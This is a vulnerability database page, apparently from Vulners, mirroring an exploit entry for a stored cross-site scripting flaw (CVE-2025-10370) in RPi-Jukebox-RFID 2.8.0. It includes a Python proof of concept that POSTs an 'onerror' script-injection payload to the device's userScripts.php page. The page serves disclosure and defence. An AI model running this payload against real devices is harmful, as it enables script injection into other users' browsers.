Vulners
Lucene search
๐ RPi-Jukebox-RFID 2.8.0 Cross Site Scripting
๐๏ธย 05 Feb 2026ย 00:00:00Reported byย Beatriz Fresno NaumovaTypeย 
ย packetstorm๐ย packetstorm.news๐ย 125ย Views
| Reporter | Title | Published | Views | Family All 10 |
|---|---|---|---|---|
 | CVE-2025-10370 | 13 Sep 202519:46 | โ | circl |
 | RPi-Jukebox-RFID ไปฃ็ ๆณจๅ ฅๆผๆด | 13 Sep 202500:00 | โ | cnnvd |
 | CVE-2025-10370 | 13 Sep 202517:02 | โ | cve |
 | CVE-2025-10370 MiczFlor RPi-Jukebox-RFID userScripts.php cross site scripting | 13 Sep 202517:02 | โ | cvelist |
 | RPi-Jukebox-RFID 2.8.0 - Stored Cross-Site Scripting (XSS) | 2 Feb 202600:00 | โ | exploitdb |
 | EUVD-2025-29096 | 3 Oct 202520:07 | โ | euvd |
 | CVE-2025-10370 | 13 Sep 202517:15 | โ | nvd |
 | PT-2025-37389 | 13 Sep 202500:00 | โ | ptsecurity |
 | CVE-2025-10370 | 15 Sep 202518:07 | โ | redhatcve |
 | CVE-2025-10370 MiczFlor RPi-Jukebox-RFID userScripts.php cross site scripting | 13 Sep 202517:02 | โ | vulnrichment |
10
# Exploit Title: RPi-Jukebox-RFID 2.8.0 - Stored XSS (CVE-2025-10370)
# Date: 2025-09-25
# Exploit Author: Beatriz Fresno Naumova
# Vendor Homepage: https://github.com/MiczFlor/RPi-Jukebox-RFID
# Software Link: https://github.com/MiczFlor/RPi-Jukebox-RFID/releases/tag/v2.8.0
# Version: 2.8.0
# Tested on: Raspberry Pi OS with RPi-Jukebox-RFID v2.8.0
# CVE: CVE-2025-10370
#
# Description:
# This PoC demonstrates a Cross-Site Scripting (XSS) vulnerability in the userScripts.php page.
# The vulnerable parameter "customScript" does not sanitize input correctly, allowing injection
# of arbitrary JavaScript payloads.
import requests
# Change this to the actual IP or hostname of the target device
TARGET = "http://YOUR-TARGET-IP/phoniebox/htdocs/userScripts.php"
# The XSS payload
PAYLOAD = '"><img src=x onerror=alert("XSS - CVE-2025-10370")>'
# HTTP headers
headers = {
"User-Agent": "Mozilla/5.0",
"Content-Type": "application/x-www-form-urlencoded",
"Referer": TARGET,
}
# POST data with the malicious payload
data = {
"customScript": PAYLOAD
}
def send_exploit():
print(f"[+] Sending XSS payload to {TARGET}")
try:
r = requests.post(TARGET, headers=headers, data=data, timeout=5)
print(f"[+] Payload sent. Status code: {r.status_code}")
print("[*] If the target is vulnerable, the payload will execute when the page is rendered.")
except Exception as e:
print(f"[-] Exploit failed: {e}")
if __name__ == "__main__":
send_exploit()Data
Build on a solid foundation withย Vulners data
Weย provide theย essential building blocks forย cybersecurity solutions withย comprehensive, structured, andย constantly updated vulnerability andย exploits data
Api
Power your application withย Vulners API
The Vulners REST API offers reliable, high-performance access toย vulnerabilityย intelligence, withย 99.9%ย SLAย uptime andย CDN-backed data delivery forย seamlessย global access
App
Assess and manage vulnerabilities withย Vulnersย tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
05 Feb 2026 00:00Current
4.6Medium risk
Vulners AI Score4.6
CVSS 3.13.5 - 5.4
CVSS 24
CVSS 45.1
CVSS 33.5
EPSS0.00637
SSVC